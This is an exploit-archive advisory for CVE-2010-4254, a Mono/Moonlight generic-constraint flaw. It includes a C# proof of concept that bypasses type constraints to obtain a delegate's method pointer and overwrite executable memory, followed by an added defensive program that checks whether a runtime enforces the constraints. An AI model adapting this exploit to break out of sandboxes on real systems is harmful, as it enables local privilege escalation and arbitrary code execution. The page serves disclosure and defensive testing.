ExploitFixes
Mono/Moonlight Generic Type Argument Local Privilege Escalation - [CVE: 2010-4254] 2011-01-11 09:15:22

Source: http://www.securityfocus.com/bid/45051/info

Mono and Moonlight are prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.

PoC:

using System;
using System.Reflection;
using System.Runtime.InteropServices;

public class DelegateWrapper {
    public IntPtr method_ptr;
}

public delegate void MethodWrapper ();

public class BreakSandbox {
    // T is constrained to DelegateWrapper; a runtime that enforces generic
    // constraints refuses to instantiate this method with any other type.
    private static DelegateWrapper Convert <T> (T dingus) where T : DelegateWrapper {
        return dingus;
    }

    private static DelegateWrapper ConvertDelegate (Delegate del) {
        var m = typeof (BreakSandbox).GetMethod ("Convert",
            BindingFlags.NonPublic | BindingFlags.Static);
        // Instantiates Convert<T> with System.Delegate, which violates the
        // constraint; the affected Mono versions do not reject this.
        var gm = m.MakeGenericMethod (typeof (Delegate));

        var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
            (typeof (Func <Delegate, DelegateWrapper>), null, gm);

        return d (del);
    }

    public static void Main (string [] args) {
        MethodWrapper d = delegate {
            Console.WriteLine ("Hello");
        };

        d ();
        var converted = ConvertDelegate (d);
        // Overwrite the already WX page with a 'ret'
        Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
        d ();
    }
}
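The root cause above is a runtime that accepts a generic type argument violating the method's `where T : ...` constraint. A defender who wants to confirm that a deployed Mono (or any CLR) enforces the constraint can run the check below. It is an added example, not part of the advisory or of Mono; the names `Holder`, `Identity` and `RuntimeEnforcesConstraints` are assumptions chosen for this check. A conforming runtime throws `ArgumentException` from `MakeGenericMethod` when the type argument does not satisfy the constraint, so the program exits 0 on a patched runtime and 1 on one that still accepts the invalid instantiation.

```csharp
using System;
using System.Reflection;

// Hypothetical stand-in for the reference type used as a constraint.
public class Holder {
    public IntPtr field;
}

public static class ConstraintCheck {
    // Same shape as the advisory's method: T is constrained to Holder.
    private static Holder Identity<T>(T value) where T : Holder {
        return value;
    }

    // Returns true when the runtime rejects a constraint-violating
    // instantiation, false when it silently accepts it.
    public static bool RuntimeEnforcesConstraints() {
        MethodInfo m = typeof(ConstraintCheck).GetMethod("Identity",
            BindingFlags.NonPublic | BindingFlags.Static);
        try {
            // System.Delegate does not derive from Holder, so a conforming
            // runtime must throw ArgumentException here.
            m.MakeGenericMethod(typeof(Delegate));
            return false;
        } catch (ArgumentException) {
            return true;
        }
    }

    public static int Main() {
        bool ok = RuntimeEnforcesConstraints();
        Console.WriteLine(ok
            ? "OK: MakeGenericMethod rejects constraint-violating type arguments"
            : "WARNING: runtime accepted a constraint-violating type argument (CVE-2010-4254 behaviour)");
        return ok ? 0 : 1;
    }
}
```

Compile with `mcs` or `csc` and run the resulting binary under the runtime you want to verify; the exit code makes it usable from a deployment smoke test.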